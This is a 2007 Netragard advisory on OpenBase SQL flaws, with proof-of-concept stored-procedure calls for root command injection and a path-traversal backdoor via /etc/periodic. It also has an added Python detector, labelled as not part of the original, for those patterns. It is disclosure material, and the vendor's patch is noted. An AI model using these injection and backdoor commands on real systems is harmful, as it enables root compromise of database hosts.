
Netragard Security Advisory 2007-03-13
Posted Nov 6, 2007
Authored by Kevin Finisterre, Adriel T. Desautels, Netragard | Site netragard.com

Netragard, L.L.C Advisory - Netragard's SNOsoft Research Team discovered two critical vulnerabilities in the OpenBase SQL Relational Database that can lead to full system compromise. OpenBase versions 10.0.5 and below are affected.

tags | advisory, vulnerability
SHA-256 | 461394d46dce182dddd5cd5ac8284bec3acbe0ca019c1b7a15477e4a510c19e6

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

********************** Netragard, L.L.C Advisory**********************
Penetration Testing, Vulnerability Assessments, Web Application Security

Strategic Reconnaissance Team
------------------------------------------------
http://www.netragard.com -- "We make I.T. Safe."

[POSTING NOTICE]
- --------------------------------------------------------------------------
If you intend to post this advisory on your web page please create a
clickable link back to the original Netragard advisory as the contents
of the advisory may be updated. The advisory can be found on the
Netragard website at http://www.netragard.com/

For more information about Netragard visit http://www.netragard.com


[Advisory Information]
- --------------------------------------------------------------------------
Contact : Adriel T. Desautels
Researcher : Kevin Finisterre
Advisory ID : NETRAGARD-20070313
Product Name : OpenBase SQL Relational Database
Product Version : <= OpenBase 10.0.5 (All Platforms)
Vendor Name : OpenBase International, Ltd.
Type of Vulnerability : Remote Buffer Overflow, Command injection
Effort : Easy

[Product Description]
- --------------------------------------------------------------------------
"For over a decade, the OpenBase family of products have been enabling
some of the most innovative business applications at work today. With
thousands of customers worldwide, OpenBase has become a brand that
companies can rely on.

OpenBase customers include AT&T, Adobe Systems, Canon, Walt Disney,
First National Bank of Chicago, MCI, Motorola, Apple, The Sharper Image
and many other innovators worldwide."

- -- http://openbase.com/home-Aboutus.html --

[Technical Summary]
- --------------------------------------------------------------------------
Netragard's SNOsoft Research Team discovered two critical
vulnerabilities in the OpenBase SQL Relational Database that can lead to
full system compromise.

The first vulnerability discovered is a command injection vulnerability
that affects several of the default Stored Procedures. Specifically,
it is possible to execute system commands as the root user by inserting
a series of backticks into the pre-defined Stored Procedures.

The second vulnerability discovered is a buffer overflow that causes heap
corruption. This also has the potential to lead to the execution of
arbitrary code or a Denial of Service condition.


[Technical Details]
- --------------------------------------------------------------------------
1. call AsciiBackup('\`id\`')
results in commands being run as root.

desktop:/tmp kfinisterre$ tail -f /tmp/isql_messages

OpenBase ISQL version 8.0 for MacOS X
Copyright (c) 1993-2003 OpenBase International. Ltd.
All Rights Reserved.

Using database 'WOMovies' on host 'localhost'

Could not write file:uid=0(root) gid=0(wheel) groups=0(wheel)/WOMovies.bck

2. call GlobalLog("../../../path/to/file", "\n user input goes here \n")
results in root owned files being created. Combine with above for an
easy backdoor.

openbase 1> call GlobalLog("../../../../../../etc/periodic/daily/600"
, "\n/usr/bin/id > /tmp/file\n")
openbase 2> go
Data returned... calculating column widths

return_0
- ----------
Success
- ----------
1 rows returned - 0.039 seconds (printed in 0.039 seconds)
openbase 1> call AsciiBackup('`chmod +x /etc/periodic/daily/600.msg;
/usr/sbin/periodic daily`')
openbase 2> go
Data returned... calculating column widths

return_0
- ----------
Failure
- ----------
1 rows returned - 1.825 seconds (printed in 1.826 seconds)
openbase 1>

3. select aaaaaaaaaaaaaaaaaaaa... from aaaaaaaaaaaaaaaaaaa...
results in zone_free() issues referencing 0x61616161

4. call OEMLicenseInstall("`/usr/bin/id>/tmp/aaax`","`/usr/bin/id>/tmp/bbbx
`","`/usr/bin/id>/tmp/ddddx`","`/usr/bin/id>/tmp/cdfx`")
results in commands being run as root

An exploitable vulnerability exists in OpenBase in the creation of
Stored Procedures that can be used to gain NT AUTHORITY\SYSTEM or root
level privileges. Specifically, a user can create a stored procedure
with an unusually long name which will trigger a buffer overflow
condition that will result in heap corruption. If done properly, an
attacker may be able to execute arbitrary commands against the affected
system.
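
Added example (not part of the Netragard advisory or of OpenBase itself): a
Python sketch that screens logged SQL statements for the three patterns shown
above, namely command substitution in stored-procedure arguments, "../" in the
GlobalLog path, and oversized identifiers. The function names, the
128-character limit and the extra "$(" check are assumptions of this sketch.

```python
import re

MAX_IDENT = 128  # assumed limit; the advisory gives no exact length
CMD_SUBST = re.compile(r"`|\$\(")            # backticks (from the advisory) or $( (assumed)
TRAVERSAL = re.compile(r"(^|/)\.\.(/|$)")    # a ".." path component
CALL = re.compile(r"^\s*call\s+(\w+)\s*\((.*)\)\s*;?\s*$", re.I | re.S)
# Single- or double-quoted SQL string literal, honouring backslash escapes.
STRING = re.compile(r"'((?:[^'\\]|\\.)*)'" + r'|"((?:[^"\\]|\\.)*)"', re.S)


def inspect_statement(sql):
    """Return a sorted list of finding labels for one SQL statement."""
    findings = set()
    # Check identifier length outside of string literals.
    bare = STRING.sub("", sql)
    if any(len(tok) > MAX_IDENT for tok in re.findall(r"\w+", bare)):
        findings.add("oversized-identifier")
    m = CALL.match(sql)
    if m:
        proc, raw_args = m.group(1), m.group(2)
        args = [a or b for a, b in STRING.findall(raw_args)]
        if any(CMD_SUBST.search(a) for a in args):
            findings.add("command-substitution")
        if proc.lower() == "globallog" and args and TRAVERSAL.search(args[0]):
            findings.add("path-traversal")
    return sorted(findings)


# Statements 0-2 are taken from the advisory text; 3-4 are constructed benign input.
SAMPLES = [
    r"call AsciiBackup('\`id\`')",
    r'call GlobalLog("../../../path/to/file", "\n user input goes here \n")',
    "select " + "a" * 300 + " from " + "a" * 300,
    "call AsciiBackup('/backups/nightly')",
    "select title from movies",
]


def scan(statements):
    """Map statement index to findings, skipping clean statements."""
    results = {i: inspect_statement(s) for i, s in enumerate(statements)}
    return {i: f for i, f in results.items() if f}


if __name__ == "__main__":
    for idx, found in scan(SAMPLES).items():
        print(idx, found)
```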


[Proof Of Concept]
- --------------------------------------------------------------------------
See Above

[Vendor Status]
- --------------------------------------------------------------------------
Vendor Notified on 03/05/07
Vendor Patched on 03/09/07
Vendor quote:

"OpenBase now runs as the 'openbase' user for security reasons. I would
like to publicly thank Kevin Finisterre for his input."

[Disclaimer]
- ------------------------http://www.netragard.com--------------------------
Netragard, L.L.C. assumes no liability for the use of the information
provided in this advisory. This advisory was released in an effort to
help the I.T. community protect themselves against a potentially
dangerous security hole. This advisory is not an attempt to solicit
business.

http://www.netragard.com

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.5 (Darwin)

iD8DBQFHL3dgQwbn1P9Iaa0RAkTrAKChtXX9q5LcP5m9DRb2SYZ1E0JipgCfaDXn
yu4Rt3X3CIzaDSJJm+SWUwo=
=EQxH
-----END PGP SIGNATURE-----
